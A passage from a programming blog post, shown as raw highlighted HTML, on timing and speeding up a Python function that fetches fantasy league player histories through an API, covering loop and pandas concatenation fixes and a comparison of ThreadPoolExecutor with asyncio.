&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; json&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;loads(player_response&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;text)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;DataFrame({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;name&amp;#39;&lt;/span&gt;: row[&lt;span style="color:#a5d6ff"&gt;&amp;#39;player_name&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;team_name&amp;#39;&lt;/span&gt;: row[&lt;span style="color:#a5d6ff"&gt;&amp;#39;entry_name&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;event&amp;#39;&lt;/span&gt;: pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;json_normalize(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;current&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )[&lt;span style="color:#a5d6ff"&gt;&amp;#39;event&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;points&amp;#39;&lt;/span&gt;: pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;json_normalize(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;current&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )[&lt;span style="color:#a5d6ff"&gt;&amp;#39;total_points&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;concat([df, player_df])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; df
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The logic is as follows:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Query API to get current league data&lt;/li&gt;
&lt;li&gt;Loop over each member of the league
&lt;ul&gt;
&lt;li&gt;Query API for individual player&lt;/li&gt;
&lt;li&gt;Return relevant data&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;As written, this is an ordinary for loop: each iteration must finish before the next
one starts. Here we don&amp;rsquo;t need to wait for the previous API call, because no player query
depends on the result of another. In theory we could run all of the individual player
queries at once and the function would be a lot faster.&lt;/p&gt;
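&lt;p&gt;To make the idea concrete, here is a minimal sketch comparing a sequential loop with overlapping calls. It does not touch the real API: &lt;code&gt;fake_player_query&lt;/code&gt; is a hypothetical stand-in that just sleeps, and the sketch uses a thread pool from the standard library, which is only one possible approach and not necessarily the one taken later in this post.&lt;/p&gt;

```python
import time
from concurrent.futures import ThreadPoolExecutor


def fake_player_query(player_id, delay=0.05):
    """Hypothetical stand-in for one API call: sleeps instead of using the network."""
    time.sleep(delay)
    return {"entry": player_id, "points": player_id * 10}


player_ids = list(range(1, 9))

# Sequential: each call waits for the previous one to finish
start = time.perf_counter()
sequential = [fake_player_query(pid) for pid in player_ids]
sequential_time = time.perf_counter() - start

# Threaded: independent calls overlap while they are waiting
start = time.perf_counter()
with ThreadPoolExecutor(max_workers=4) as pool:
    threaded = list(pool.map(fake_player_query, player_ids))
threaded_time = time.perf_counter() - start

print(f"sequential: {sequential_time:.2f}s, threaded: {threaded_time:.2f}s")
```

&lt;p&gt;Because &lt;code&gt;pool.map&lt;/code&gt; returns results in input order, both versions produce the same list; only the waiting time differs.&lt;/p&gt;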
&lt;h2 id="measuring-function-calls-in-python"&gt;Measuring function calls in Python&lt;/h2&gt;
&lt;p&gt;We can measure how long it takes to run a piece of Python code using the &lt;a href="https://docs.python.org/3/library/time.html" rel="external"&gt;&lt;code&gt;time&lt;/code&gt;&lt;/a&gt; module. For example, to time
my &lt;code&gt;get_season_league&lt;/code&gt; function:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;time&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;get_league&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; get_season_league
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;start_time &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; time&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;time()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; get_season_league()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;print(&lt;span style="color:#a5d6ff"&gt;&amp;#34;--- &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;%s&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt; seconds ---&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&lt;/span&gt; (time&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;time() &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; start_time))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;My function was taking ~3.5 seconds for the default league, which has 13 players, with
11 game weeks played so far. That is an average of 0.27 seconds per player (including the single original API call).&lt;/p&gt;
&lt;p&gt;I also tested it on a larger league of 50 people, where it seems to take ~13 seconds but with more variance. This
is a similar 0.26 seconds per player.&lt;/p&gt;
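&lt;p&gt;Since single timings vary from run to run, one option is to repeat the measurement and look at the spread. The sketch below is an illustration only: &lt;code&gt;time_call&lt;/code&gt; and &lt;code&gt;slow_placeholder&lt;/code&gt; are hypothetical names, and the placeholder sleeps briefly instead of calling &lt;code&gt;get_season_league()&lt;/code&gt;. It uses &lt;code&gt;time.perf_counter()&lt;/code&gt;, which is intended for measuring short durations.&lt;/p&gt;

```python
import statistics
import time


def time_call(func, repeats=5):
    """Run func several times and return the elapsed time of each run in seconds."""
    timings = []
    for _ in range(repeats):
        start = time.perf_counter()
        func()
        timings.append(time.perf_counter() - start)
    return timings


def slow_placeholder():
    # Hypothetical stand-in for get_season_league(); sleeps instead of querying the API
    time.sleep(0.01)


timings = time_call(slow_placeholder, repeats=5)
print(f"mean: {statistics.mean(timings):.3f}s, stdev: {statistics.stdev(timings):.3f}s")
```

&lt;p&gt;Swapping &lt;code&gt;slow_placeholder&lt;/code&gt; for the real function would give a mean and standard deviation rather than a single number.&lt;/p&gt;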
&lt;p&gt;This is why I want to parallelise the function: if the independent API calls could be
made all at once, or at least several at a time, the function could be sped up massively. For example,
for the league of 50 at 0.26 seconds per player, running two processes
at once could bring the total down to ~6.5 seconds, and four processes to ~3.25 seconds. These values are approximate,
but hopefully you can see the value of splitting up the parallelisable parts of the workload.&lt;/p&gt;
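&lt;p&gt;The arithmetic behind those estimates can be written out as a small helper. This is a back-of-the-envelope sketch under an idealised assumption: the work divides evenly between workers, with no overhead and no rate limiting by the API. The name &lt;code&gt;estimated_runtime&lt;/code&gt; is hypothetical.&lt;/p&gt;

```python
def estimated_runtime(n_players, seconds_per_call, n_workers):
    """Idealised estimate: total call time shared evenly between the workers."""
    return n_players * seconds_per_call / n_workers


# League of 50 at roughly 0.26 seconds per player
estimates = {
    workers: round(estimated_runtime(50, 0.26, workers), 2)
    for workers in (1, 2, 4)
}

for workers, seconds in estimates.items():
    print(f"{workers} worker(s): about {seconds} seconds")
```

&lt;p&gt;Real timings will be worse than this ideal, since starting workers and waiting on the slowest call both add time.&lt;/p&gt;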
&lt;h2 id="optimising-the-function"&gt;Optimising the Function&lt;/h2&gt;
&lt;p&gt;Before starting on the asynchronous side there are a few things we can address first.&lt;/p&gt;
&lt;h3 id="iterrows-alternative"&gt;&lt;code&gt;iterrows()&lt;/code&gt; Alternative&lt;/h3&gt;
&lt;p&gt;The &lt;code&gt;iterrows()&lt;/code&gt; function is pretty inefficient for this use case (and in general).
&lt;a href="https://ryxcommar.com/2020/01/15/for-the-love-of-god-stop-using-iterrows/" rel="external"&gt;This blog&lt;/a&gt; explains
why, and covers better alternatives like &lt;code&gt;itertuples&lt;/code&gt;. However, I am just going to loop
over a zip of the values I need.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Old:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; index, row &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; league&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;iterrows():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    player_id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; row[&lt;span style="color:#a5d6ff"&gt;&amp;#39;entry&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    player_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; row[&lt;span style="color:#a5d6ff"&gt;&amp;#39;player_name&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    team_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; row[&lt;span style="color:#a5d6ff"&gt;&amp;#39;entry_name&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# New:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; player_id, player_name, team_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; zip(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    league[&lt;span style="color:#a5d6ff"&gt;&amp;#39;entry&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    league[&lt;span style="color:#a5d6ff"&gt;&amp;#39;player_name&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    league[&lt;span style="color:#a5d6ff"&gt;&amp;#39;entry_name&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    ...  &lt;span style="color:#8b949e;font-style:italic"&gt;# loop body as before&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="concatenating-dataframes"&gt;Concatenating DataFrames&lt;/h3&gt;
&lt;p&gt;Another improvement is to stop concatenating DataFrames inside the for loop and instead either
concatenate once at the end, or build a list of dictionaries and convert it
to a DataFrame at the end.&lt;/p&gt;
&lt;p&gt;The reason is the way pandas handles DataFrame memory allocation: each &lt;code&gt;pd.concat&lt;/code&gt; call copies the data into a new DataFrame, so concatenating inside a loop repeats that copy on every iteration. There is more detail in this &lt;a href="https://saturncloud.io/blog/efficiently-appending-to-a-dataframe-within-a-for-loop-in-python/" rel="external"&gt;Saturn
Cloud blog&lt;/a&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Old:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;DataFrame([])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; index, row &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; league&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;iterrows():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        player_query &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; api_url &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;entry/&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; str(row[&lt;span style="color:#a5d6ff"&gt;&amp;#39;entry&amp;#39;&lt;/span&gt;]) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;/history&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        player_response &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;get(player_query)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        player_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; json&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;loads(player_response&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;text)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        player_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;DataFrame({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            &lt;span style="color:#a5d6ff"&gt;&amp;#39;name&amp;#39;&lt;/span&gt;: row[&lt;span style="color:#a5d6ff"&gt;&amp;#39;player_name&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            &lt;span style="color:#a5d6ff"&gt;&amp;#39;team_name&amp;#39;&lt;/span&gt;: row[&lt;span style="color:#a5d6ff"&gt;&amp;#39;entry_name&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            &lt;span style="color:#a5d6ff"&gt;&amp;#39;event&amp;#39;&lt;/span&gt;: pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;json_normalize(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;                player_data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;current&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            )[&lt;span style="color:#a5d6ff"&gt;&amp;#39;event&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            &lt;span style="color:#a5d6ff"&gt;&amp;#39;points&amp;#39;&lt;/span&gt;: pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;json_normalize(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;                player_data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;current&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            )[&lt;span style="color:#a5d6ff"&gt;&amp;#39;total_points&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;concat([df, player_df])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; df
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# New:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    list_to_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; []
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; player_id, player_name, team_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; zip(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        league[&lt;span style="color:#a5d6ff"&gt;&amp;#34;entry&amp;#34;&lt;/span&gt;], league[&lt;span style="color:#a5d6ff"&gt;&amp;#34;player_name&amp;#34;&lt;/span&gt;], league[&lt;span style="color:#a5d6ff"&gt;&amp;#34;entry_name&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    ):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        player_query &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; api_url &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;entry/&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; str(player_id) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;/history&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        player_response &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;get(player_query)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        player_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; json&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;loads(player_response&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;text)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        player_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;DataFrame({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            &lt;span style="color:#a5d6ff"&gt;&amp;#39;name&amp;#39;&lt;/span&gt;: player_name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            &lt;span style="color:#a5d6ff"&gt;&amp;#39;team_name&amp;#39;&lt;/span&gt;: team_name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            &lt;span style="color:#a5d6ff"&gt;&amp;#39;event&amp;#39;&lt;/span&gt;: pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;json_normalize(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;                player_data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;current&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            )[&lt;span style="color:#a5d6ff"&gt;&amp;#39;event&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            &lt;span style="color:#a5d6ff"&gt;&amp;#39;points&amp;#39;&lt;/span&gt;: pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;json_normalize(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;                player_data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;current&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            )[&lt;span style="color:#a5d6ff"&gt;&amp;#39;total_points&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        list_to_df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;append(player_df)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;concat(list_to_df, ignore_index&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; df
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;These changes do seem to have sped up the function by a few seconds (for the league of 50), but the bulk
of the time is taken by the API queries. These best practices aren&amp;rsquo;t going to speed it up much, but they are
worth implementing nevertheless.&lt;/p&gt;
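&lt;p&gt;The list-of-dictionaries route mentioned above is not shown in the snippet, so here is a minimal sketch of it. The &lt;code&gt;fake_responses&lt;/code&gt; data and the player names are made up for illustration and stand in for the parsed API responses; only the &lt;code&gt;current&lt;/code&gt;, &lt;code&gt;event&lt;/code&gt; and &lt;code&gt;total_points&lt;/code&gt; keys are taken from the code above.&lt;/p&gt;

```python
import pandas as pd

# Hypothetical stand-in for the parsed API responses, keyed by player name.
# The 'current' / 'event' / 'total_points' keys mirror those used above.
fake_responses = {
    "Ada": {"current": [{"event": 1, "total_points": 60},
                        {"event": 2, "total_points": 115}]},
    "Grace": {"current": [{"event": 1, "total_points": 72},
                          {"event": 2, "total_points": 130}]},
}

rows = []
for name, player_data in fake_responses.items():
    for gameweek in player_data["current"]:
        # One plain dictionary per output row; no DataFrame is built in the loop
        rows.append({
            "name": name,
            "event": gameweek["event"],
            "points": gameweek["total_points"],
        })

# A single DataFrame construction at the end
df = pd.DataFrame(rows)
print(df)
```

&lt;p&gt;Appending to a Python list is cheap, and the DataFrame is only built once, which is the same idea as the single &lt;code&gt;pd.concat&lt;/code&gt; call.&lt;/p&gt;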
&lt;h2 id="asynchronising-the-code"&gt;Asynchronising the Code&lt;/h2&gt;
&lt;p&gt;Before I start on this section, I will give a brief background on asynchronous programming. If you want
more detail, please read &lt;a href="https://blog.devgenius.io/multi-threading-vs-asynchronous-programming-what-is-the-difference-3ebfe1179a5" rel="external"&gt;this blog&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;There are two main routes we can go down here:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;code&gt;concurrent.futures.ThreadPoolExecutor&lt;/code&gt; will use multiple threads, so the code is technically synchronous;
it will just be running at the same time in different threads. This will be easier to implement with the
current code, however the time gains wouldn&amp;rsquo;t scale as well as the alternative. Each thread adds some
memory and scheduling overhead, but threads that are waiting on an API response release the GIL, so no additional processors are needed.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;code&gt;asyncio&lt;/code&gt; uses single-threaded cooperative multitasking, so the code is truly asynchronous. The syntax is more complex
and doesn&amp;rsquo;t integrate very well with my current function; for example, I would need to replace &lt;code&gt;requests&lt;/code&gt; with
an async HTTP client such as &lt;code&gt;aiohttp&lt;/code&gt;. This would definitely be the better option if I were making lots of API calls, but on a smaller
scale the gains wouldn&amp;rsquo;t be as significant.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
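&lt;p&gt;To make the difference between the two routes concrete, here is a rough sketch that replaces the real API calls with a fixed 0.2 second wait. The function names, the delay and the player IDs are all invented for the illustration; with a real API the timings will differ.&lt;/p&gt;

```python
import asyncio
import time
from concurrent.futures import ThreadPoolExecutor

DELAY = 0.2  # pretend each API call takes 0.2 seconds
PLAYER_IDS = [1, 2, 3, 4, 5]


def fetch_blocking(player_id):
    """Stand-in for requests.get(): blocks the calling thread while waiting."""
    time.sleep(DELAY)
    return player_id * 10


async def fetch_async(player_id):
    """Stand-in for an async HTTP call: hands control back while waiting."""
    await asyncio.sleep(DELAY)
    return player_id * 10


def run_with_threads():
    # Each worker thread runs ordinary synchronous code
    with ThreadPoolExecutor(max_workers=5) as executor:
        return list(executor.map(fetch_blocking, PLAYER_IDS))


async def run_with_asyncio():
    # A single thread switches between tasks at each await
    return list(await asyncio.gather(*(fetch_async(p) for p in PLAYER_IDS)))


start = time.perf_counter()
thread_results = run_with_threads()
thread_seconds = time.perf_counter() - start

start = time.perf_counter()
async_results = asyncio.run(run_with_asyncio())
async_seconds = time.perf_counter() - start

print(thread_results, round(thread_seconds, 2))
print(async_results, round(async_seconds, 2))
```

&lt;p&gt;On a small batch like this, both versions should finish in roughly the time of a single call, rather than five calls back to back.&lt;/p&gt;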
&lt;h2 id="concurrentfuturesthreadpoolexecutor"&gt;concurrent.futures.ThreadPoolExecutor&lt;/h2&gt;
&lt;p&gt;For this blog I will be going with &lt;code&gt;concurrent.futures.ThreadPoolExecutor&lt;/code&gt; as it integrates nicely with my
existing code and the bigger gains from &lt;code&gt;asyncio&lt;/code&gt; won&amp;rsquo;t really suit my use case.&lt;/p&gt;
&lt;p&gt;The first thing I need to do (which could&amp;rsquo;ve been done earlier) is extract the per-player logic to a separate function.
This function will take a player&amp;rsquo;s details, then use the player ID to query the API and grab the player&amp;rsquo;s season data. It
will then return it as a DataFrame.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_player_data&lt;/span&gt;(player_info, api_url):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&amp;#34;Fetch data for a single player and return as DataFrame&amp;#34;&amp;#34;&amp;#34;&lt;/span&gt;
